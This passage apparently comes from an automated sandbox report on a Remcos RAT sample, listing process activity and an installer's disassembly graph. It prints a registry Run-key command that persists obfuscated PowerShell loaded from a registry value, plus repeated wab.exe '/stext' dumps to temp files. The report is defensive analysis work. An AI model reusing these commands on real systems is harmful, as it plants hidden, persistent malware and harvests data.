                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:07:44:04
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3324378709.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2945584583.0000000009A7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:07:44:19
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Emraud" /t REG_EXPAND_SZ /d "%Skraastillinger% -windowstyle minimized $Boplskommunens=(Get-ItemProperty -Path 'HKCU:\Somervillite\').Efs;%Skraastillinger% ($Boplskommunens)"
                                                      Imagebase:0x600000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iqylzxvzgukwqzib"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lkdwaqoatccasgefpzj"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:07:44:26
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vmqobizuhkvfdmsjykvozo"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:07:44:27
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qtegxhlgdhz"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\awsyyzwhrprlrb"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cqxrzshbfxjqbhhfak"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:07:44:32
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hhytwjmog"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sbdlxbwhukxba"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uvjexuhjqspgcijx"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6932 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:07:44:37
                                                      Start date:26/04/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 352 -s 12
                                                      Imagebase:0xc30000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zmkgulmo"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:42
                                                      Start time:07:44:43
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jhpzvdxigfe"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:43
                                                      Start time:07:44:44
                                                      Start date:26/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mjdrowijunwwlk"
                                                      Imagebase:0x380000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:20.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:22.4%
                                                        Total number of Nodes:1249
                                                        Total number of Limit Nodes:29
                                                        execution_graph 2908 4022c0 2909 4022f0 2908->2909 2910 4022c5 2908->2910 2911 4029fd 18 API calls 2909->2911 2921 402b07 2910->2921 2913 4022f7 2911->2913 2931 402a3d RegOpenKeyExA 2913->2931 2914 4022cc 2915 4022d6 2914->2915 2920 40230f 2914->2920 2925 4029fd 2915->2925 2922 4029fd 18 API calls 2921->2922 2923 402b20 2922->2923 2924 402b2e RegOpenKeyExA 2923->2924 2924->2914 2926 402a09 2925->2926 2941 405d00 2926->2941 2929 4022dd RegDeleteValueA RegCloseKey 2929->2920 2932 402a68 2931->2932 2938 40230d 2931->2938 2933 402a8e RegEnumKeyA 2932->2933 2934 402aa0 RegCloseKey 2932->2934 2936 402ac5 RegCloseKey 2932->2936 2939 402a3d 3 API calls 2932->2939 2933->2932 2933->2934 2980 406009 GetModuleHandleA 2934->2980 2936->2938 2938->2920 2939->2932 2940 402ae0 RegDeleteKeyA 2940->2938 2946 405d0d 2941->2946 2942 405f30 2943 402a2a 2942->2943 2975 405cde lstrcpynA 2942->2975 2943->2929 2959 405f49 2943->2959 2945 405dae GetVersion 2945->2946 2946->2942 2946->2945 2947 405f07 lstrlenA 2946->2947 2950 405d00 10 API calls 2946->2950 2952 405e26 GetSystemDirectoryA 2946->2952 2953 405e39 GetWindowsDirectoryA 2946->2953 2954 405f49 5 API calls 2946->2954 2955 405e6d SHGetSpecialFolderLocation 2946->2955 2956 405d00 10 API calls 2946->2956 2957 405eb0 lstrcatA 2946->2957 2968 405bc5 RegOpenKeyExA 2946->2968 2973 405c3c wsprintfA 2946->2973 2974 405cde lstrcpynA 2946->2974 2947->2946 2950->2947 2952->2946 2953->2946 2954->2946 2955->2946 2958 405e85 SHGetPathFromIDListA CoTaskMemFree 2955->2958 2956->2946 2957->2946 2958->2946 2966 405f55 2959->2966 2960 405fc1 CharPrevA 2963 405fbd 2960->2963 2961 405fb2 CharNextA 2961->2963 2961->2966 2963->2960 2964 405fdc 2963->2964 2964->2929 2965 405fa0 CharNextA 2965->2966 2966->2961 2966->2963 2966->2965 2967 405fad CharNextA 2966->2967 2976 405799 2966->2976 2967->2961 2969 405c36 2968->2969 2970 405bf8 RegQueryValueExA 2968->2970 2969->2946 2971 405c19 RegCloseKey 2970->2971 2971->2969 2973->2946 2974->2946 2975->2943 2977 40579f 2976->2977 2978 4057b2 2977->2978 2979 4057a5 CharNextA 2977->2979 2978->2966 2979->2977 2981 406030 GetProcAddress 2980->2981 2982 406025 LoadLibraryA 2980->2982 2983 402ab0 2981->2983 2982->2981 2982->2983 2983->2938 2983->2940 3673 4019c0 3674 4029fd 18 API calls 3673->3674 3675 4019c7 3674->3675 3676 4029fd 18 API calls 3675->3676 3677 4019d0 3676->3677 3678 4019d7 lstrcmpiA 3677->3678 3679 4019e9 lstrcmpA 3677->3679 3680 4019dd 3678->3680 3679->3680 3688 402b42 3689 402b51 SetTimer 3688->3689 3690 402b6a 3688->3690 3689->3690 3691 402bb8 3690->3691 3692 402bbe MulDiv 3690->3692 3693 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 3692->3693 3693->3691 3695 4043c3 3696 4043d3 3695->3696 3697 4043f9 3695->3697 3698 403fcc 19 API calls 3696->3698 3699 404033 8 API calls 3697->3699 3700 4043e0 SetDlgItemTextA 3698->3700 3701 404405 3699->3701 3700->3697 3702 402645 3703 4029fd 18 API calls 3702->3703 3704 40264c FindFirstFileA 3703->3704 3705 40266f 3704->3705 3708 40265f 3704->3708 3710 405c3c wsprintfA 3705->3710 3707 402676 3711 405cde lstrcpynA 3707->3711 3710->3707 3711->3708 3712 404946 GetDlgItem GetDlgItem 3713 404998 7 API calls 3712->3713 3725 404bb0 3712->3725 3714 404a3b DeleteObject 3713->3714 3715 404a2e SendMessageA 3713->3715 3716 404a44 3714->3716 3715->3714 3718 404a7b 3716->3718 3719 405d00 18 API calls 3716->3719 3717 404c94 3721 404d40 3717->3721 3727 404ba3 3717->3727 3732 404ced SendMessageA 3717->3732 3720 403fcc 19 API calls 3718->3720 3722 404a5d SendMessageA SendMessageA 3719->3722 3726 404a8f 3720->3726 3723 404d52 3721->3723 3724 404d4a SendMessageA 3721->3724 3722->3716 3734 404d64 ImageList_Destroy 3723->3734 3735 404d6b 3723->3735 3743 404d7b 3723->3743 3724->3723 3725->3717 3746 404c21 3725->3746 3765 404894 SendMessageA 3725->3765 3731 403fcc 19 API calls 3726->3731 3728 404033 8 API calls 3727->3728 3733 404f36 3728->3733 3729 404c86 SendMessageA 3729->3717 3747 404a9d 3731->3747 3732->3727 3737 404d02 SendMessageA 3732->3737 3734->3735 3738 404d74 GlobalFree 3735->3738 3735->3743 3736 404eea 3736->3727 3741 404efc ShowWindow GetDlgItem ShowWindow 3736->3741 3740 404d15 3737->3740 3738->3743 3739 404b71 GetWindowLongA SetWindowLongA 3742 404b8a 3739->3742 3749 404d26 SendMessageA 3740->3749 3741->3727 3744 404b90 ShowWindow 3742->3744 3745 404ba8 3742->3745 3743->3736 3748 404db6 3743->3748 3770 404914 3743->3770 3763 404001 SendMessageA 3744->3763 3764 404001 SendMessageA 3745->3764 3746->3717 3746->3729 3747->3739 3750 404b6b 3747->3750 3753 404aec SendMessageA 3747->3753 3754 404b28 SendMessageA 3747->3754 3755 404b39 SendMessageA 3747->3755 3759 404de4 SendMessageA 3748->3759 3762 404dfa 3748->3762 3749->3721 3750->3739 3750->3742 3753->3747 3754->3747 3755->3747 3757 404ec0 InvalidateRect 3757->3736 3758 404ed6 3757->3758 3779 4047b2 3758->3779 3759->3762 3761 404e6e SendMessageA SendMessageA 3761->3762 3762->3757 3762->3761 3763->3727 3764->3725 3766 4048f3 SendMessageA 3765->3766 3767 4048b7 GetMessagePos ScreenToClient SendMessageA 3765->3767 3769 4048eb 3766->3769 3768 4048f0 3767->3768 3767->3769 3768->3766 3769->3746 3787 405cde lstrcpynA 3770->3787 3772 404927 3788 405c3c wsprintfA 3772->3788 3774 404931 3775 40140b 2 API calls 3774->3775 3776 40493a 3775->3776 3789 405cde lstrcpynA 3776->3789 3778 404941 3778->3748 3780 4047cc 3779->3780 3781 405d00 18 API calls 3780->3781 3782 404801 3781->3782 3783 405d00 18 API calls 3782->3783 3784 40480c 3783->3784 3785 405d00 18 API calls 3784->3785 3786 40483d lstrlenA wsprintfA SetDlgItemTextA 3785->3786 3786->3736 3787->3772 3788->3774 3789->3778 3790 4023c8 3791 402b07 19 API calls 3790->3791 3792 4023d2 3791->3792 3793 4029fd 18 API calls 3792->3793 3794 4023db 3793->3794 3795 4023e5 RegQueryValueExA 3794->3795 3800 402663 3794->3800 3796 40240b RegCloseKey 3795->3796 3797 402405 3795->3797 3796->3800 3797->3796 3801 405c3c wsprintfA 3797->3801 3801->3796 3805 40474c 3806 404778 3805->3806 3807 40475c 3805->3807 3809 4047ab 3806->3809 3810 40477e SHGetPathFromIDListA 3806->3810 3816 4054d6 GetDlgItemTextA 3807->3816 3812 404795 SendMessageA 3810->3812 3813 40478e 3810->3813 3811 404769 SendMessageA 3811->3806 3812->3809 3814 40140b 2 API calls 3813->3814 3814->3812 3816->3811 3817 401ccc GetDlgItem GetClientRect 3818 4029fd 18 API calls 3817->3818 3819 401cfc LoadImageA SendMessageA 3818->3819 3820 402892 3819->3820 3821 401d1a DeleteObject 3819->3821 3821->3820 3822 4024d1 3823 4024d6 3822->3823 3824 4024e7 3822->3824 3826 4029e0 18 API calls 3823->3826 3825 4029fd 18 API calls 3824->3825 3827 4024ee lstrlenA 3825->3827 3828 4024dd 3826->3828 3827->3828 3829 40250d WriteFile 3828->3829 3830 402663 3828->3830 3829->3830 3831 4025d3 3832 40283f 3831->3832 3833 4025da 3831->3833 3834 4029e0 18 API calls 3833->3834 3835 4025e5 3834->3835 3836 4025ec SetFilePointer 3835->3836 3836->3832 3837 4025fc 3836->3837 3839 405c3c wsprintfA 3837->3839 3839->3832 3840 4014d6 3841 4029e0 18 API calls 3840->3841 3842 4014dc Sleep 3841->3842 3844 402892 3842->3844 3852 401dd8 3853 4029fd 18 API calls 3852->3853 3854 401dde 3853->3854 3855 4029fd 18 API calls 3854->3855 3856 401de7 3855->3856 3857 4029fd 18 API calls 3856->3857 3858 401df0 3857->3858 3859 4029fd 18 API calls 3858->3859 3860 401df9 3859->3860 3861 401423 25 API calls 3860->3861 3862 401e00 ShellExecuteA 3861->3862 3863 401e2d 3862->3863 3864 40155b 3865 401577 ShowWindow 3864->3865 3866 40157e 3864->3866 3865->3866 3867 402892 3866->3867 3868 40158c ShowWindow 3866->3868 3868->3867 3869 401edc 3870 4029fd 18 API calls 3869->3870 3871 401ee3 GetFileVersionInfoSizeA 3870->3871 3872 401f06 GlobalAlloc 3871->3872 3874 401f5c 3871->3874 3873 401f1a GetFileVersionInfoA 3872->3873 3872->3874 3873->3874 3875 401f2b VerQueryValueA 3873->3875 3875->3874 3876 401f44 3875->3876 3880 405c3c wsprintfA 3876->3880 3878 401f50 3881 405c3c wsprintfA 3878->3881 3880->3878 3881->3874 3882 4040e0 lstrcpynA lstrlenA 3888 4018e3 3889 40191a 3888->3889 3890 4029fd 18 API calls 3889->3890 3891 40191f 3890->3891 3892 40559e 71 API calls 3891->3892 3893 401928 3892->3893 3894 4018e6 3895 4029fd 18 API calls 3894->3895 3896 4018ed 3895->3896 3897 4054f2 MessageBoxIndirectA 3896->3897 3898 4018f6 3897->3898 3899 401f68 3900 401f7a 3899->3900 3901 402028 3899->3901 3902 4029fd 18 API calls 3900->3902 3903 401423 25 API calls 3901->3903 3904 401f81 3902->3904 3909 402181 3903->3909 3905 4029fd 18 API calls 3904->3905 3906 401f8a 3905->3906 3907 401f92 GetModuleHandleA 3906->3907 3908 401f9f LoadLibraryExA 3906->3908 3907->3908 3910 401faf GetProcAddress 3907->3910 3908->3901 3908->3910 3911 401ffb 3910->3911 3912 401fbe 3910->3912 3913 404fc9 25 API calls 3911->3913 3914 401423 25 API calls 3912->3914 3915 401fce 3912->3915 3913->3915 3914->3915 3915->3909 3916 40201c FreeLibrary 3915->3916 3916->3909 3917 40286d SendMessageA 3918 402892 3917->3918 3919 402887 InvalidateRect 3917->3919 3919->3918 3934 4014f0 SetForegroundWindow 3935 402892 3934->3935 3936 401af0 3937 4029fd 18 API calls 3936->3937 3938 401af7 3937->3938 3939 4029e0 18 API calls 3938->3939 3940 401b00 wsprintfA 3939->3940 3941 402892 3940->3941 3942 4019f1 3943 4029fd 18 API calls 3942->3943 3944 4019fa ExpandEnvironmentStringsA 3943->3944 3945 401a0e 3944->3945 3947 401a21 3944->3947 3946 401a13 lstrcmpA 3945->3946 3945->3947 3946->3947 3955 401c78 3956 4029e0 18 API calls 3955->3956 3957 401c7e IsWindow 3956->3957 3958 4019e1 3957->3958 3542 403af9 3543 403b11 3542->3543 3544 403c4c 3542->3544 3543->3544 3545 403b1d 3543->3545 3546 403c9d 3544->3546 3547 403c5d GetDlgItem GetDlgItem 3544->3547 3548 403b28 SetWindowPos 3545->3548 3549 403b3b 3545->3549 3551 403cf7 3546->3551 3559 401389 2 API calls 3546->3559 3550 403fcc 19 API calls 3547->3550 3548->3549 3552 403b40 ShowWindow 3549->3552 3553 403b58 3549->3553 3554 403c87 SetClassLongA 3550->3554 3555 404018 SendMessageA 3551->3555 3572 403c47 3551->3572 3552->3553 3556 403b60 DestroyWindow 3553->3556 3557 403b7a 3553->3557 3558 40140b 2 API calls 3554->3558 3581 403d09 3555->3581 3611 403f55 3556->3611 3560 403b90 3557->3560 3561 403b7f SetWindowLongA 3557->3561 3558->3546 3562 403ccf 3559->3562 3565 403c39 3560->3565 3566 403b9c GetDlgItem 3560->3566 3561->3572 3562->3551 3567 403cd3 SendMessageA 3562->3567 3563 40140b 2 API calls 3563->3581 3564 403f57 DestroyWindow EndDialog 3564->3611 3571 404033 8 API calls 3565->3571 3569 403bcc 3566->3569 3570 403baf SendMessageA IsWindowEnabled 3566->3570 3567->3572 3568 403f86 ShowWindow 3568->3572 3574 403bd9 3569->3574 3575 403c20 SendMessageA 3569->3575 3576 403bec 3569->3576 3585 403bd1 3569->3585 3570->3569 3570->3572 3571->3572 3573 405d00 18 API calls 3573->3581 3574->3575 3574->3585 3575->3565 3578 403bf4 3576->3578 3579 403c09 3576->3579 3577 403fa5 SendMessageA 3580 403c07 3577->3580 3582 40140b 2 API calls 3578->3582 3583 40140b 2 API calls 3579->3583 3580->3565 3581->3563 3581->3564 3581->3572 3581->3573 3584 403fcc 19 API calls 3581->3584 3587 403fcc 19 API calls 3581->3587 3602 403e97 DestroyWindow 3581->3602 3582->3585 3586 403c10 3583->3586 3584->3581 3585->3577 3586->3565 3586->3585 3588 403d84 GetDlgItem 3587->3588 3589 403da1 ShowWindow KiUserCallbackDispatcher 3588->3589 3590 403d99 3588->3590 3612 403fee KiUserCallbackDispatcher 3589->3612 3590->3589 3592 403dcb EnableWindow 3595 403ddf 3592->3595 3593 403de4 GetSystemMenu EnableMenuItem SendMessageA 3594 403e14 SendMessageA 3593->3594 3593->3595 3594->3595 3595->3593 3613 404001 SendMessageA 3595->3613 3614 405cde lstrcpynA 3595->3614 3598 403e42 lstrlenA 3599 405d00 18 API calls 3598->3599 3600 403e53 SetWindowTextA 3599->3600 3601 401389 2 API calls 3600->3601 3601->3581 3603 403eb1 CreateDialogParamA 3602->3603 3602->3611 3604 403ee4 3603->3604 3603->3611 3605 403fcc 19 API calls 3604->3605 3606 403eef GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3605->3606 3607 401389 2 API calls 3606->3607 3608 403f35 3607->3608 3608->3572 3609 403f3d ShowWindow 3608->3609 3610 404018 SendMessageA 3609->3610 3610->3611 3611->3568 3611->3572 3612->3592 3613->3595 3614->3598 3959 4014fe 3960 401506 3959->3960 3962 401519 3959->3962 3961 4029e0 18 API calls 3960->3961 3961->3962 3963 40227f 3964 4029fd 18 API calls 3963->3964 3965 402290 3964->3965 3966 4029fd 18 API calls 3965->3966 3967 402299 3966->3967 3968 4029fd 18 API calls 3967->3968 3969 4022a3 GetPrivateProfileStringA 3968->3969 3970 401000 3971 401037 BeginPaint GetClientRect 3970->3971 3972 40100c DefWindowProcA 3970->3972 3974 4010f3 3971->3974 3975 401179 3972->3975 3976 401073 CreateBrushIndirect FillRect DeleteObject 3974->3976 3977 4010fc 3974->3977 3976->3974 3978 401102 CreateFontIndirectA 3977->3978 3979 401167 EndPaint 3977->3979 3978->3979 3980 401112 6 API calls 3978->3980 3979->3975 3980->3979 3981 402602 3982 402892 3981->3982 3983 402609 3981->3983 3984 40260f FindClose 3983->3984 3984->3982 3985 402683 3986 4029fd 18 API calls 3985->3986 3987 402691 3986->3987 3988 4026a7 3987->3988 3989 4029fd 18 API calls 3987->3989 3990 40594a 2 API calls 3988->3990 3989->3988 3991 4026ad 3990->3991 4011 40596f GetFileAttributesA CreateFileA 3991->4011 3993 4026ba 3994 402763 3993->3994 3995 4026c6 GlobalAlloc 3993->3995 3996 40276b DeleteFileA 3994->3996 3997 40277e 3994->3997 3998 40275a CloseHandle 3995->3998 3999 4026df 3995->3999 3996->3997 3998->3994 4012 4031cc SetFilePointer 3999->4012 4001 4026e5 4002 4031b6 ReadFile 4001->4002 4003 4026ee GlobalAlloc 4002->4003 4004 402732 WriteFile GlobalFree 